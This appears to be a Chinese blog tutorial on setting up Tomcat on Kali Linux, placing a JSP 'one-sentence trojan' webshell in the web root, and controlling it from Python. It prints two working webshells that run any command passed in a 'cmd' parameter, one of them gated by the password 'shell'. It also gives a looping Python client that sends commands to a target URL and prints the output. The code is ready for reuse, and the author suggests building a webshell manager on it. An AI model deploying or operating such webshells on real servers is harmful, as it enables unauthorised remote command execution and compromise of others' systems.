使用python连接JSP一句话木马

首先需要安装tomcat。

去官网 http://tomcat.apache.org/ 下载对应的 Linux 版本。

这里,我下载的是 apache-tomcat-8.5.70.tar.gz
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
最好提前安装好 JDK1.8 ,因为 kali 自带的那个可能会出现一点问题。

这是我遇到的问题,随手记录了一下。

https://blog.csdn.net/weixin_45254208/article/details/119897865

不过你也可以不重装,等出了问题再重装,万一你的电脑就没有我这种情况呢。

在这里插入图片描述

好了,回到 tomcat 的安装这个问题上来。

解压缩下载好的安装包。

tar -zxvf apache-tomcat-8.5.70.tar.gz

将解压后的目录,移动到 /usr/local/ 目录下。

然后,使用命令 vim /etc/profile 配置环境变量,权限不够就加 sudo

在文档最下方添加以下环境变量配置代码

export CATALINA_HOME=/usr/local/software/tomcat8.5.70

在这里插入图片描述
使用命令 source /etc/profile 让配置立即生效。

进入 tomcat 安装目录的 bin 目录,执行 ./startup.sh,看到如图提示代表启动成功。

在这里插入图片描述
在这里插入图片描述

接下来才是重点,前面那都是安装和配置环节。

tomcat 的跟目录在 /usr/local/apache-tomcat-8.5.70/webapps/ROOT ,在该路目中写一个 JSP 一句话木马,名为 shell.jsp ,如下图所示(我已提前写好)。

在这里插入图片描述
最简单的 JSP 一句话,其内容为:

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

不过,我用的是另外一个 webshell ,稍微长一点。

<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>一句话木马</title>
    </head>

    <body>
        <%
        if ("shell".equals(request.getParameter("pwd"))) {
            java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int len = -1;
            byte[] bytes = new byte[4092];
            out.print("<pre>");
            while ((len = input.read(bytes)) != -1) {
                out.println(new String(bytes, "GBK"));
            }
            out.print("</pre>");
        }
    %>
    </body>

</html>

其中,shell 是连接密码,变量 cmd 用于接收参数。

在 Windows 本机验证一下。

在这里插入图片描述
在这里插入图片描述

但是,既然标题说的是用python连接,那我当然不能忘了。

其实代码十分简单,无非就是使用 python 的 requests 库,发送请求,传递参数,执行命令。

import requests

url = str(input('目标URL:'))      # http://192.168.223.130:8080/shell.jsp
pwd = str(input('连接密码:'))      # 其实就是一句话木马中的变量shell

while(True):
    cmd = str(input('想要执行的命令:'))

    # 将命令传给 JSP 一句话木马
    payload = {
        'pwd': '{}'.format(pwd),
        'cmd': '{}'.format(cmd)
    }


    # 向目标url发送post请求
    response = requests.post(url=url, params=payload)

    # 回显命令执行的结果
    print(response.text)

结果如下:

在这里插入图片描述
在这里插入图片描述

在此基础上,可以更加深入一点,最终开发出一个 webshell 的连接管理工具,也不是不可以。

如果本文对你有用的话,欢迎点赞收藏。

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值